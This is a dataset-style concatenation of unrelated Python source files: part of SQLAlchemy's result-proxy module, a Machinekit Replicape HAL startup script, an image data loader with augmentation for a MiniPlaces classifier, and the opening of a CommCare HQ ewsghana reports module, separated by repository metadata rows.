try:
# We need a different reconstructor on the C extension so that we can
# add extra checks that fields have correctly been initialized by
# __setstate__.
from sqlalchemy.cresultproxy import safe_rowproxy_reconstructor
# The extra function embedding is needed so that the
# reconstructor function has the same signature whether or not
# the extension is present.
def rowproxy_reconstructor(cls, state):
return safe_rowproxy_reconstructor(cls, state)
except ImportError:
def rowproxy_reconstructor(cls, state):
obj = cls.__new__(cls)
obj.__setstate__(state)
return obj
try:
from sqlalchemy.cresultproxy import BaseRowProxy
except ImportError:
class BaseRowProxy(object):
__slots__ = ('_parent', '_row', '_processors', '_keymap')
def __init__(self, parent, row, processors, keymap):
"""RowProxy objects are constructed by ResultProxy objects."""
self._parent = parent
self._row = row
self._processors = processors
self._keymap = keymap
def __reduce__(self):
return (rowproxy_reconstructor,
(self.__class__, self.__getstate__()))
def values(self):
"""Return the values represented by this RowProxy as a list."""
return list(self)
def __iter__(self):
for processor, value in zip(self._processors, self._row):
if processor is None:
yield value
else:
yield processor(value)
def __len__(self):
return len(self._row)
def __getitem__(self, key):
try:
processor, obj, index = self._keymap[key]
except KeyError:
processor, obj, index = self._parent._key_fallback(key)
except TypeError:
if isinstance(key, slice):
l = []
for processor, value in zip(self._processors[key],
self._row[key]):
if processor is None:
l.append(value)
else:
l.append(processor(value))
return tuple(l)
else:
raise
if index is None:
raise exc.InvalidRequestError(
"Ambiguous column name '%s' in result set! "
"try 'use_labels' option on select statement." % key)
if processor is not None:
return processor(self._row[index])
else:
return self._row[index]
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError(e.args[0])
class RowProxy(BaseRowProxy):
"""Proxy values from a single cursor row.
Mostly follows "ordered dictionary" behavior, mapping result
values to the string-based column name, the integer position of
the result in the row, as well as Column instances which can be
mapped to the original Columns that produced this result set (for
results that correspond to constructed SQL expressions).
"""
__slots__ = ()
def __contains__(self, key):
return self._parent._has_key(self._row, key)
def __getstate__(self):
return {
'_parent': self._parent,
'_row': tuple(self)
}
def __setstate__(self, state):
self._parent = parent = state['_parent']
self._row = state['_row']
self._processors = parent._processors
self._keymap = parent._keymap
__hash__ = None
def _op(self, other, op):
return op(tuple(self), tuple(other)) \
if isinstance(other, RowProxy) \
else op(tuple(self), other)
def __lt__(self, other):
return self._op(other, operator.lt)
def __le__(self, other):
return self._op(other, operator.le)
def __ge__(self, other):
return self._op(other, operator.ge)
def __gt__(self, other):
return self._op(other, operator.gt)
def __eq__(self, other):
return self._op(other, operator.eq)
def __ne__(self, other):
return self._op(other, operator.ne)
def __repr__(self):
return repr(tuple(self))
def has_key(self, key):
"""Return True if this RowProxy contains the given key."""
return self._parent._has_key(self._row, key)
def items(self):
"""Return a list of tuples, each tuple containing a key/value pair."""
# TODO: no coverage here
return [(key, self[key]) for key in self.keys()]
def keys(self):
"""Return the list of keys as strings represented by this RowProxy."""
return self._parent.keys
def iterkeys(self):
return iter(self._parent.keys)
def itervalues(self):
return iter(self)
try:
# Register RowProxy with Sequence,
# so sequence protocol is implemented
from collections import Sequence
Sequence.register(RowProxy)
except ImportError:
pass
class ResultMetaData(object):
"""Handle cursor.description, applying additional info from an execution
context."""
def __init__(self, parent, metadata):
self._processors = processors = []
# We do not strictly need to store the processor in the key mapping,
# though it is faster in the Python version (probably because of the
# saved attribute lookup self._processors)
self._keymap = keymap = {}
self.keys = []
context = parent.context
dialect = context.dialect
typemap = dialect.dbapi_type_map
translate_colname = context._translate_colname
self.case_sensitive = dialect.case_sensitive
# high precedence key values.
primary_keymap = {}
for i, rec in enumerate(metadata):
colname = rec[0]
coltype = rec[1]
if dialect.description_encoding:
colname = dialect._description_decoder(colname)
if translate_colname:
colname, untranslated = translate_colname(colname)
if dialect.requires_name_normalize:
colname = dialect.normalize_name(colname)
if context.result_map:
try:
name, obj, type_ = context.result_map[colname
if self.case_sensitive
else colname.lower()]
except KeyError:
name, obj, type_ = \
colname, None, typemap.get(coltype, sqltypes.NULLTYPE)
else:
name, obj, type_ = \
colname, None, typemap.get(coltype, sqltypes.NULLTYPE)
processor = context.get_result_processor(type_, colname, coltype)
processors.append(processor)
rec = (processor, obj, i)
# indexes as keys. This is only needed for the Python version of
# RowProxy (the C version uses a faster path for integer indexes).
primary_keymap[i] = rec
# populate primary keymap, looking for conflicts.
if primary_keymap.setdefault(
name if self.case_sensitive
else name.lower(),
rec) is not rec:
# place a record that doesn't have the "index" - this
# is interpreted later as an AmbiguousColumnError,
# but only when actually accessed. Columns
# colliding by name is not a problem if those names
# aren't used; integer access is always
# unambiguous.
primary_keymap[name
if self.case_sensitive
else name.lower()] = rec = (None, obj, None)
self.keys.append(colname)
if obj:
for o in obj:
keymap[o] = rec
# technically we should be doing this but we
# are saving on callcounts by not doing so.
# if keymap.setdefault(o, rec) is not rec:
# keymap[o] = (None, obj, None)
if translate_colname and \
untranslated:
keymap[untranslated] = rec
# overwrite keymap values with those of the
# high precedence keymap.
keymap.update(primary_keymap)
@util.pending_deprecation("0.8", "sqlite dialect uses "
"_translate_colname() now")
def _set_keymap_synonym(self, name, origname):
"""Set a synonym for the given name.
Some dialects (SQLite at the moment) may use this to
adjust the column names that are significant within a
row.
"""
rec = (processor, obj, i) = self._keymap[origname if
self.case_sensitive
else origname.lower()]
if self._keymap.setdefault(name, rec) is not rec:
self._keymap[name] = (processor, obj, None)
def _key_fallback(self, key, raiseerr=True):
map = self._keymap
result = None
if isinstance(key, util.string_types):
result = map.get(key if self.case_sensitive else key.lower())
# fallback for targeting a ColumnElement to a textual expression
# this is a rare use case which only occurs when matching text()
# or colummn('name') constructs to ColumnElements, or after a
# pickle/unpickle roundtrip
elif isinstance(key, expression.ColumnElement):
if key._label and (
key._label
if self.case_sensitive
else key._label.lower()) in map:
result = map[key._label
if self.case_sensitive
else key._label.lower()]
elif hasattr(key, 'name') and (
key.name
if self.case_sensitive
else key.name.lower()) in map:
# match is only on name.
result = map[key.name
if self.case_sensitive
else key.name.lower()]
# search extra hard to make sure this
# isn't a column/label name overlap.
# this check isn't currently available if the row
# was unpickled.
if result is not None and \
result[1] is not None:
for obj in result[1]:
if key._compare_name_for_result(obj):
break
else:
result = None
if result is None:
if raiseerr:
raise exc.NoSuchColumnError(
"Could not locate column in row for column '%s'" %
expression._string_or_unprintable(key))
else:
return None
else:
map[key] = result
return result
def _has_key(self, row, key):
if key in self._keymap:
return True
else:
return self._key_fallback(key, False) is not None
def __getstate__(self):
return {
'_pickled_keymap': dict(
(key, index)
for key, (processor, obj, index) in self._keymap.items()
if isinstance(key, util.string_types + util.int_types)
),
'keys': self.keys,
"case_sensitive": self.case_sensitive,
}
def __setstate__(self, state):
# the row has been processed at pickling time so we don't need any
# processor anymore
self._processors = [None for _ in range(len(state['keys']))]
self._keymap = keymap = {}
for key, index in state['_pickled_keymap'].items():
# not preserving "obj" here, unfortunately our
# proxy comparison fails with the unpickle
keymap[key] = (None, None, index)
self.keys = state['keys']
self.case_sensitive = state['case_sensitive']
self._echo = False
class ResultProxy(object):
"""Wraps a DB-API cursor object to provide easier access to row columns.
Individual columns may be accessed by their integer position,
case-insensitive column name, or by ``schema.Column``
object. e.g.::
row = fetchone()
col1 = row[0] # access via integer position
col2 = row['col2'] # access via name
col3 = row[mytable.c.mycol] # access via Column object.
``ResultProxy`` also handles post-processing of result column
data using ``TypeEngine`` objects, which are referenced from
the originating SQL statement that produced this result set.
"""
_process_row = RowProxy
out_parameters = None
_can_close_connection = False
_metadata = None
def __init__(self, context):
self.context = context
self.dialect = context.dialect
self.closed = False
self.cursor = self._saved_cursor = context.cursor
self.connection = context.root_connection
self._echo = self.connection._echo and \
context.engine._should_log_debug()
self._init_metadata()
def _init_metadata(self):
metadata = self._cursor_description()
if metadata is not None:
if self.context.compiled and \
'compiled_cache' in self.context.execution_options:
if self.context.compiled._cached_metadata:
self._metadata = self.context.compiled._cached_metadata
else:
self._metadata = self.context.compiled._cached_metadata = \
ResultMetaData(self, metadata)
else:
self._metadata = ResultMetaData(self, metadata)
if self._echo:
self.context.engine.logger.debug(
"Col %r", tuple(x[0] for x in metadata))
def keys(self):
"""Return the current set of string keys for rows."""
if self._metadata:
return self._metadata.keys
else:
return []
@util.memoized_property
def rowcount(self):
"""Return the 'rowcount' for this result.
The 'rowcount' reports the number of rows *matched*
by the WHERE criterion of an UPDATE or DELETE statement.
.. note::
Notes regarding :attr:`.ResultProxy.rowcount`:
* This attribute returns the number of rows *matched*,
which is not necessarily the same as the number of rows
that were actually *modified* - an UPDATE statement, for example,
may have no net change on a given row if the SET values
given are the same as those present in the row already.
Such a row would be matched but not modified.
On backends that feature both styles, such as MySQL,
rowcount is configured by default to return the match
count in all cases.
* :attr:`.ResultProxy.rowcount` is *only* useful in conjunction
with an UPDATE or DELETE statement. Contrary to what the Python
DBAPI says, it does *not* return the
number of rows available from the results of a SELECT statement
as DBAPIs cannot support this functionality when rows are
unbuffered.
* :attr:`.ResultProxy.rowcount` may not be fully implemented by
all dialects. In particular, most DBAPIs do not support an
aggregate rowcount result from an executemany call.
The :meth:`.ResultProxy.supports_sane_rowcount` and
:meth:`.ResultProxy.supports_sane_multi_rowcount` methods
will report from the dialect if each usage is known to be
supported.
* Statements that use RETURNING may not return a correct
rowcount.
"""
try:
return self.context.rowcount
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None, self.cursor, self.context)
@property
def lastrowid(self):
"""return the 'lastrowid' accessor on the DBAPI cursor.
This is a DBAPI specific method and is only functional
for those backends which support it, for statements
where it is appropriate. It's behavior is not
consistent across backends.
Usage of this method is normally unnecessary when
using insert() expression constructs; the
:attr:`~ResultProxy.inserted_primary_key` attribute provides a
tuple of primary key values for a newly inserted row,
regardless of database backend.
"""
try:
return self._saved_cursor.lastrowid
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self._saved_cursor, self.context)
@property
def returns_rows(self):
"""True if this :class:`.ResultProxy` returns rows.
I.e. if it is legal to call the methods
:meth:`~.ResultProxy.fetchone`,
:meth:`~.ResultProxy.fetchmany`
:meth:`~.ResultProxy.fetchall`.
"""
return self._metadata is not None
@property
def is_insert(self):
"""True if this :class:`.ResultProxy` is the result
of a executing an expression language compiled
:func:`.expression.insert` construct.
When True, this implies that the
:attr:`inserted_primary_key` attribute is accessible,
assuming the statement did not include
a user defined "returning" construct.
"""
return self.context.isinsert
def _cursor_description(self):
"""May be overridden by subclasses."""
return self._saved_cursor.description
def close(self, _autoclose_connection=True):
"""Close this ResultProxy.
Closes the underlying DBAPI cursor corresponding to the execution.
Note that any data cached within this ResultProxy is still available.
For some types of results, this may include buffered rows.
If this ResultProxy was generated from an implicit execution,
the underlying Connection will also be closed (returns the
underlying DBAPI connection to the connection pool.)
This method is called automatically when:
* all result rows are exhausted using the fetchXXX() methods.
* cursor.description is None.
"""
if not self.closed:
self.closed = True
self.connection._safe_close_cursor(self.cursor)
if _autoclose_connection and \
self.connection.should_close_with_result:
self.connection.close()
# allow consistent errors
self.cursor = None
def __iter__(self):
while True:
row = self.fetchone()
if row is None:
raise StopIteration
else:
yield row
@util.memoized_property
def inserted_primary_key(self):
"""Return the primary key for the row just inserted.
The return value is a list of scalar values
corresponding to the list of primary key columns
in the target table.
This only applies to single row :func:`.insert`
constructs which did not explicitly specify
:meth:`.Insert.returning`.
Note that primary key columns which specify a
server_default clause,
or otherwise do not qualify as "autoincrement"
columns (see the notes at :class:`.Column`), and were
generated using the database-side default, will
appear in this list as ``None`` unless the backend
supports "returning" and the insert statement executed
with the "implicit returning" enabled.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() "
"expression construct.")
elif self.context._is_explicit_returning:
raise exc.InvalidRequestError(
"Can't call inserted_primary_key "
"when returning() "
"is used.")
return self.context.inserted_primary_key
def last_updated_params(self):
"""Return the collection of updated parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an update() "
"expression construct.")
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
def last_inserted_params(self):
"""Return the collection of inserted parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() "
"expression construct.")
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
@property
def returned_defaults(self):
"""Return the values of default columns that were fetched using
the :meth:`.ValuesBase.return_defaults` feature.
The value is an instance of :class:`.RowProxy`, or ``None``
if :meth:`.ValuesBase.return_defaults` was not used or if the
backend does not support RETURNING.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.ValuesBase.return_defaults`
"""
return self.context.returned_defaults
def lastrow_has_defaults(self):
"""Return ``lastrow_has_defaults()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
"""
return self.context.lastrow_has_defaults()
def postfetch_cols(self):
"""Return ``postfetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct.")
return self.context.postfetch_cols
def prefetch_cols(self):
"""Return ``prefetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct.")
return self.context.prefetch_cols
def supports_sane_rowcount(self):
"""Return ``supports_sane_rowcount`` from the dialect.
See :attr:`.ResultProxy.rowcount` for background.
"""
return self.dialect.supports_sane_rowcount
def supports_sane_multi_rowcount(self):
"""Return ``supports_sane_multi_rowcount`` from the dialect.
See :attr:`.ResultProxy.rowcount` for background.
"""
return self.dialect.supports_sane_multi_rowcount
def _fetchone_impl(self):
try:
return self.cursor.fetchone()
except AttributeError:
self._non_result()
def _fetchmany_impl(self, size=None):
try:
if size is None:
return self.cursor.fetchmany()
else:
return self.cursor.fetchmany(size)
except AttributeError:
self._non_result()
def _fetchall_impl(self):
try:
return self.cursor.fetchall()
except AttributeError:
self._non_result()
def _non_result(self):
if self._metadata is None:
raise exc.ResourceClosedError(
"This result object does not return rows. "
"It has been closed automatically.",
)
else:
raise exc.ResourceClosedError("This result object is closed.")
def process_rows(self, rows):
process_row = self._process_row
metadata = self._metadata
keymap = metadata._keymap
processors = metadata._processors
if self._echo:
log = self.context.engine.logger.debug
l = []
for row in rows:
log("Row %r", row)
l.append(process_row(metadata, row, processors, keymap))
return l
else:
return [process_row(metadata, row, processors, keymap)
for row in rows]
def fetchall(self):
"""Fetch all rows, just like DB-API ``cursor.fetchall()``."""
try:
l = self.process_rows(self._fetchall_impl())
self.close()
return l
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def fetchmany(self, size=None):
"""Fetch many rows, just like DB-API
``cursor.fetchmany(size=cursor.arraysize)``.
If rows are present, the cursor remains open after this is called.
Else the cursor is automatically closed and an empty list is returned.
"""
try:
l = self.process_rows(self._fetchmany_impl(size))
if len(l) == 0:
self.close()
return l
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def fetchone(self):
"""Fetch one row, just like DB-API ``cursor.fetchone()``.
If a row is present, the cursor remains open after this is called.
Else the cursor is automatically closed and None is returned.
"""
try:
row = self._fetchone_impl()
if row is not None:
return self.process_rows([row])[0]
else:
self.close()
return None
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def first(self):
"""Fetch the first row and then close the result set unconditionally.
Returns None if no row is present.
"""
if self._metadata is None:
self._non_result()
try:
row = self._fetchone_impl()
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
try:
if row is not None:
return self.process_rows([row])[0]
else:
return None
finally:
self.close()
def scalar(self):
"""Fetch the first column of the first row, and close the result set.
Returns None if no row is present.
"""
row = self.first()
if row is not None:
return row[0]
else:
return None
class BufferedRowResultProxy(ResultProxy):
"""A ResultProxy with row buffering behavior.
``ResultProxy`` that buffers the contents of a selection of rows
before ``fetchone()`` is called. This is to allow the results of
``cursor.description`` to be available immediately, when
interfacing with a DB-API that requires rows to be consumed before
this information is available (currently psycopg2, when used with
server-side cursors).
The pre-fetching behavior fetches only one row initially, and then
grows its buffer size by a fixed amount with each successive need
for additional rows up to a size of 100.
"""
def _init_metadata(self):
self.__buffer_rows()
super(BufferedRowResultProxy, self)._init_metadata()
# this is a "growth chart" for the buffering of rows.
# each successive __buffer_rows call will use the next
# value in the list for the buffer size until the max
# is reached
size_growth = {
1: 5,
5: 10,
10: 20,
20: 50,
50: 100,
100: 250,
250: 500,
500: 1000
}
def __buffer_rows(self):
size = getattr(self, '_bufsize', 1)
self.__rowbuffer = collections.deque(self.cursor.fetchmany(size))
self._bufsize = self.size_growth.get(size, size)
def _fetchone_impl(self):
if self.closed:
return None
if not self.__rowbuffer:
self.__buffer_rows()
if not self.__rowbuffer:
return None
return self.__rowbuffer.popleft()
def _fetchmany_impl(self, size=None):
if size is None:
return self._fetchall_impl()
result = []
for x in range(0, size):
row = self._fetchone_impl()
if row is None:
break
result.append(row)
return result
def _fetchall_impl(self):
self.__rowbuffer.extend(self.cursor.fetchall())
ret = self.__rowbuffer
self.__rowbuffer = collections.deque()
return ret
class FullyBufferedResultProxy(ResultProxy):
"""A result proxy that buffers rows fully upon creation.
Used for operations where a result is to be delivered
after the database conversation can not be continued,
such as MSSQL INSERT...OUTPUT after an autocommit.
"""
def _init_metadata(self):
super(FullyBufferedResultProxy, self)._init_metadata()
self.__rowbuffer = self._buffer_rows()
def _buffer_rows(self):
return collections.deque(self.cursor.fetchall())
def _fetchone_impl(self):
if self.__rowbuffer:
return self.__rowbuffer.popleft()
else:
return None
def _fetchmany_impl(self, size=None):
if size is None:
return self._fetchall_impl()
result = []
for x in range(0, size):
row = self._fetchone_impl()
if row is None:
break
result.append(row)
return result
def _fetchall_impl(self):
ret = self.__rowbuffer
self.__rowbuffer = collections.deque()
return ret
class BufferedColumnRow(RowProxy):
def __init__(self, parent, row, processors, keymap):
# preprocess row
row = list(row)
# this is a tad faster than using enumerate
index = 0
for processor in parent._orig_processors:
if processor is not None:
row[index] = processor(row[index])
index += 1
row = tuple(row)
super(BufferedColumnRow, self).__init__(parent, row,
processors, keymap)
class BufferedColumnResultProxy(ResultProxy):
"""A ResultProxy with column buffering behavior.
``ResultProxy`` that loads all columns into memory each time
fetchone() is called. If fetchmany() or fetchall() are called,
the full grid of results is fetched. This is to operate with
databases where result rows contain "live" results that fall out
of scope unless explicitly fetched. Currently this includes
cx_Oracle LOB objects.
"""
_process_row = BufferedColumnRow
def _init_metadata(self):
super(BufferedColumnResultProxy, self)._init_metadata()
metadata = self._metadata
# orig_processors will be used to preprocess each row when they are
# constructed.
metadata._orig_processors = metadata._processors
# replace the all type processors by None processors.
metadata._processors = [None for _ in range(len(metadata.keys))]
keymap = {}
for k, (func, obj, index) in metadata._keymap.items():
keymap[k] = (None, obj, index)
self._metadata._keymap = keymap
def fetchall(self):
# can't call cursor.fetchall(), since rows must be
# fully processed before requesting more from the DBAPI.
l = []
while True:
row = self.fetchone()
if row is None:
break
l.append(row)
return l
def fetchmany(self, size=None):
# can't call cursor.fetchmany(), since rows must be
# fully processed before requesting more from the DBAPI.
if size is None:
return self.fetchall()
l = []
for i in range(size):
row = self.fetchone()
if row is None:
break
l.append(row)
return l
| mit | 7,757,144,335,151,465,000 | 33.582133 | 84 | 0.566028 | false |
strahlex/machinekit | configs/ARM/BeagleBone/Replicape-Stretch/ARM.Replicape.B3/replicape.py | 5 | 1365 | #!/usr/bin/python2
# encoding: utf-8
"""
replicape.py
Machinekit HAL for Replicape Rev B3
Copyright (c) 2016 Sam Wong
Adaptation to Debian Stretch and kernel 4.14.x, extensions as in README.md:
Copyright (c) Karl Jacobs
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from replicape import base
from machinekit import hal
base.init_hardware()
hal.loadusr('haltalk', wait=True)
| lgpl-2.1 | 4,948,745,157,163,811,000 | 51.5 | 460 | 0.791209 | false |
atitus5/MiniPlaces | DataLoader_multi.py | 1 | 9187 | import os
import numpy as np
import scipy.misc
import h5py
import random
np.random.seed(123)
# loading data from .h5
class DataLoaderH5(object):
def __init__(self, **kwargs):
self.load_size = int(kwargs['load_size'])
self.fine_size = int(kwargs['fine_size'])
self.data_mean = np.array(kwargs['data_mean'])
self.randomize = kwargs['randomize']
# read data info from lists
f = h5py.File(kwargs['data_h5'], "r")
self.im_set = np.array(f['images'])
self.lab_set = np.array(f['labels'])
self.num = self.im_set.shape[0]
assert self.im_set.shape[0]==self.lab_set.shape[0], '#images and #labels do not match!'
assert self.im_set.shape[2]==self.load_size, 'Image size error!'
assert self.im_set.shape[1]==self.load_size, 'Image size error!'
print('# Images found:', self.num)
print("Shuffling...")
if self.randomize:
self.shuffle()
self._idx = 0
print("DataLoader ready.")
def next_batch_all(self, batch_size):
labels_batch = np.zeros(batch_size*9)
images_batch = np.zeros((batch_size*9, self.fine_size, self.fine_size, 3))
for i in range(batch_size):
image = self.im_set[self._idx]
image = image.astype(np.float32)/255. - self.data_mean
resize_factor = np.random.random_integers(self.load_size, self.load_size*2)
image_1 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_1 = image_1.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_1 = image_1[:,::-1,:]
offset_h = np.random.random_integers(0, image_1.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_1.shape[1]-self.fine_size)
images_batch[9*i+loc_i, ...] = image_1[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[9*i+loc_i, ...] = self.lab_set[self._idx]
resize_factor = np.random.random_integers(self.fine_size, self.load_size)
image_2 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_2 = image_2.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_2 = image_2[:,::-1,:]
offset_h = np.random.random_integers(0, image_2.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_2.shape[1]-self.fine_size)
images_batch[3+9*i+loc_i, ...] = image_2[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[3+9*i+loc_i, ...] = self.lab_set[self._idx]
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, image.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image.shape[1]-self.fine_size)
images_batch[6+9*i+loc_i, ...] = image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[6+9*i+loc_i, ...] = self.lab_set[self._idx]
self._idx += 1
if self._idx == self.num:
self._idx = 0
if self.randomize:
self.shuffle()
return images_batch, labels_batch
def next_batch_sample(self, batch_size):
labels_batch = np.zeros(batch_size)
images_batch = np.zeros((batch_size, self.fine_size, self.fine_size, 3))
for i in range(batch_size):
image = self.im_set[self._idx]
image = image.astype(np.float32)/255. - self.data_mean
resize_factor = np.random.random_integers(self.load_size, self.load_size*2)
images_labels = []
image_1 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_1 = image_1.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_1 = image_1[:,::-1,:]
offset_h = np.random.random_integers(0, image_1.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_1.shape[1]-self.fine_size)
images_labels.append((image_1[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
resize_factor = np.random.random_integers(self.fine_size, self.load_size)
image_2 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_2 = image_2.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_2 = image_2[:,::-1,:]
offset_h = np.random.random_integers(0, image_2.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_2.shape[1]-self.fine_size)
images_labels.append((image_2[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, image.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image.shape[1]-self.fine_size)
images_labels.append((image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
choice = random.choice(images_labels)
images_batch[i, ...] = choice[0]
labels_batch[i, ...] = choice[1]
self._idx += 1
if self._idx == self.num:
self._idx = 0
if self.randomize:
self.shuffle()
return images_batch, labels_batch
def size(self):
return self.num
def reset(self):
self._idx = 0
def shuffle(self):
perm = np.random.permutation(self.num)
self.im_set = self.im_set[perm]
self.lab_set = self.lab_set[perm]
# Loading data from disk
class DataLoaderDisk(object):
def __init__(self, **kwargs):
self.load_size = int(kwargs['load_size'])
self.fine_size = int(kwargs['fine_size'])
self.data_mean = np.array(kwargs['data_mean'])
self.randomize = kwargs['randomize']
self.data_root = os.path.join(kwargs['data_root'])
# read data info from lists
self.list_im = []
self.list_lab = []
with open(kwargs['data_list'], 'r') as f:
for line in f:
path, lab =line.rstrip().split(' ')
self.list_im.append(os.path.join(self.data_root, path))
self.list_lab.append(int(lab))
self.list_im = np.array(self.list_im, np.object)
self.list_lab = np.array(self.list_lab, np.int64)
self.num = self.list_im.shape[0]
print('# Images found:', self.num)
# permutation
perm = np.random.permutation(self.num)
self.list_im[:, ...] = self.list_im[perm, ...]
self.list_lab[:] = self.list_lab[perm, ...]
self._idx = 0
def next_batch(self, batch_size):
images_batch = np.zeros((batch_size, self.fine_size, self.fine_size, 3))
labels_batch = np.zeros(batch_size)
for i in range(batch_size):
image = scipy.misc.imread(self.list_im[self._idx])
image = scipy.misc.imresize(image, (self.load_size, self.load_size))
image = image.astype(np.float32)/255.
image = image - self.data_mean
if self.randomize:
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, self.load_size-self.fine_size)
offset_w = np.random.random_integers(0, self.load_size-self.fine_size)
else:
offset_h = (self.load_size-self.fine_size)//2
offset_w = (self.load_size-self.fine_size)//2
images_batch[i, ...] = image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[i, ...] = self.list_lab[self._idx]
self._idx += 1
if self._idx == self.num:
self._idx = 0
return images_batch, labels_batch
def size(self):
return self.num
def reset(self):
self._idx = 0
| mit | 7,697,863,647,594,161,000 | 40.949772 | 142 | 0.534669 | false |
benrudolph/commcare-hq | custom/ewsghana/reports/__init__.py | 1 | 11687 | from datetime import datetime
from django.core.urlresolvers import reverse
from django.db.models import Q
from corehq import Domain
from corehq.apps.programs.models import Program
from corehq.apps.reports.commtrack.standard import CommtrackReportMixin
from corehq.apps.reports.filters.dates import DatespanFilter
from corehq.apps.reports.filters.fixtures import AsyncLocationFilter
from corehq.apps.reports.generic import GenericTabularReport
from corehq.apps.reports.graph_models import LineChart, MultiBarChart
from corehq.apps.reports.standard import CustomProjectReport, ProjectReportParametersMixin, DatespanMixin
from custom.ewsghana.filters import ProductByProgramFilter
from dimagi.utils.decorators.memoized import memoized
from corehq.apps.locations.models import Location, SQLLocation
from custom.ewsghana.utils import get_supply_points
from casexml.apps.stock.models import StockTransaction
def get_url(view_name, text, domain):
return '<a href="%s">%s</a>' % (reverse(view_name, args=[domain]), text)
def get_url_with_location(view_name, text, location_id, domain):
return '<a href="%s?location_id=%s">%s</a>' % (reverse(view_name, args=[domain]), location_id, text)
class EWSLineChart(LineChart):
template_partial = 'ewsghana/partials/ews_line_chart.html'
class EWSMultiBarChart(MultiBarChart):
template_partial = 'ewsghana/partials/ews_multibar_chart.html'
class EWSData(object):
